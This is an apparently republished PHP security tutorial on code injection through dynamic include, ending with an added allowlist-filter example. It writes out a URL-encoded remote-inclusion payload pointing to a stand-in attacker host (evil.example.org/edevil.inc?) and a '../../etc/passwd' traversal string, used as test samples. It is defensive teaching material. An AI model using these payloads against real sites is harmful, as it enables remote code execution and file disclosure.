PHP Security - Code Injection

Source: Internet
Author: User
Code injection

A particularly dangerous situation arises when tainted data is used as the leading part of a dynamic include, for example a user-supplied path that is concatenated with a fixed file name such as /header.inc before being passed to include.


In this case, attackers can manipulate not only the file name but also the kind of resource that gets included. By default, PHP can include not just local files but also remote resources fetched over a URL (controlled by the allow_url_fopen directive in the configuration file).

If, for instance, the include statement is given the URL of the Google home page, it fetches that page and includes its source code as if it were a local file. The example itself is harmless, but imagine what would happen if the source code returned by Google contained PHP code: the included PHP code would be parsed and executed. This gives an attacker a convenient way to plant malicious code and defeat your security controls.

Now imagine that the path value points to a resource controlled by an attacker, for example:

http%3A%2F%2Fevil.example.org%2Fedevil.inc%3F

In this example the path value is URL encoded; decoded, it reads:

http://evil.example.org/edevil.inc?

This causes the include statement to fetch and execute the attacker's chosen script (edevil.inc), while the original file name, /header.inc, is treated as a query string, because the include resolves to http://evil.example.org/edevil.inc?/header.inc.


This saves the attacker from having to guess the remaining directory and file name (/header.inc) and from having to recreate the same path and file name on evil.example.org. Instead, the appended file name of the site under attack is neutralized, and the attacker only has to make sure that the code to be executed is valid PHP in edevil.inc.

This situation is as dangerous as allowing attackers to modify the PHP code on your website directly. Fortunately, filtering the data before it reaches an include or require statement is enough to prevent it.
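The following is an added example and is not code from the original page or its source site. It places the unfiltered include described above beside a filtered version that validates the path against an allowlist before any concatenation happens. The directory names in TEMPLATE_DIRS and the function names are assumptions chosen for the example; the sample inputs are constructed, and the encoded value is the one discussed in the text.

```php
<?php
// Added example (not from the original page).
//
// Vulnerable form, as the text describes:
//   include "{$_GET['path']}/header.inc";
// If URL includes are allowed, a path such as
//   http%3A%2F%2Fevil.example.org%2Fedevil.inc%3F   (URL encoded)
// decodes to http://evil.example.org/edevil.inc? and the include resolves to
//   http://evil.example.org/edevil.inc?/header.inc
// so the attacker's script runs and "/header.inc" is only a query string.

// Hypothetical allowlist of the template directories this application uses.
const TEMPLATE_DIRS = ['themes/default', 'themes/dark', 'themes/print'];

/**
 * Return the path if it is exactly one of the known directories, else null.
 * The value is compared as-is and before any concatenation, so stream
 * wrappers (http://, ftp://, php://, data:) and traversal (../) can never
 * reach include in any form.
 */
function filter_template_path(string $path): ?string
{
    return in_array($path, TEMPLATE_DIRS, true) ? $path : null;
}

/**
 * Include the header only when the path survives the allowlist check.
 * Returns true when the include happened, false when it was refused.
 */
function include_header(array $get): bool
{
    $clean = [];
    $clean['path'] = filter_template_path($get['path'] ?? '');
    if ($clean['path'] === null) {
        // Log the refusal so repeated probing shows up in the application log.
        error_log('refused include, path not in allowlist: ' . ($get['path'] ?? ''));
        return false;
    }
    // Anchored to the application directory; only validated values reach here.
    include __DIR__ . "/{$clean['path']}/header.inc";
    return true;
}

// Constructed inputs: a legitimate value, the decoded value from the text
// (PHP has already URL-decoded $_GET by the time the script runs), and a
// traversal attempt. Only the first is accepted.
$samples = [
    'themes/dark',
    'http://evil.example.org/edevil.inc?',
    '../../etc/passwd',
];
foreach ($samples as $sample) {
    $result = filter_template_path($sample);
    printf("%-40s => %s\n", $sample, $result === null ? 'refused' : 'accepted');
}
```

The check is an exact-match allowlist rather than a blocklist of strings like "http://" or "../", because a blocklist has to anticipate every wrapper and encoding, while an allowlist only has to know the handful of directories the application actually ships. A point not covered by the original page: since PHP 5.2, including a URL also requires the separate allow_url_include directive, which is off by default; keeping it off is a second layer, but the input filter is what protects the include from local traversal and other wrappers regardless of that setting.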

The above covers PHP security and code injection. For more information, see the PHP Chinese website (www.php1.cn).
